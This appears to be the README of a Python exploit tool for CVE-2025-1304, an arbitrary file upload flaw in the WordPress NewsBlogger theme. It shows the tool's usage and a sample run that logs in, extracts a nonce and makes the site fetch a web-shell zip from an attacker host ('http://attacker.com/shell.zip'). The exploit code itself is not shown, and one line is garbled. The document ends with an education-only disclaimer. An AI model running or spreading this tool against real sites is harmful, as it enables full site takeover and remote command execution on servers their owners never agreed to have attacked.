
WordPress NewsBlogger Theme <= 0.2.5.1 é vulnerável a Upload Arbitrário de Arquivos
Pontuação CVSS: 8.8 (Alto)
Tipo de Vulnerabilidade: Upload Arbitrário de Arquivo
Componente: Tema WordPress
ID CVE: CVE-2025-1304
O tema NewsBlogger do WordPress (versões <= 0.2.5.1) é vulnerável a um Upload Arbitrário de Arquivo através do painel de boas-vindas do administrador.
Esta vulnerabilidade permite que qualquer usuário autenticado — incluindo aqueles com a função mínima de Assinante — faça upload de um arquivo .zip malicioso contendo um web shell.
O upload ocorre através de um campo de URL de plugin não validado, que falha em verificar adequadamente o conteúdo ou tipo do arquivo enviado.
Um ataque bem-sucedido pode levar ao comprometimento total do site, incluindo execução remota de comandos e escalonamento de privilégios.
Este script Python automatiza a exploração da vulnerabilidade ao:
nonce dinamicamente da página de boas-vindas vulnerável.python CVE-2025-1304.py -h
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
--url, -u URL Target base URL (e.g., http://target/wordpress)
--username, -un USERNAME WordPress admin username
--password, -p PASSWORD WordPress admin password
--shellweb, -shell SHELLWEB
Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
Este código é fornecido apenas para fins educacionais e testes de segurança autorizados.
O autor não assume nenhuma responsabilidade por uso indevido ou danos causados por esta ferramenta.
Por: Nxploited ( Khaled Alenazi )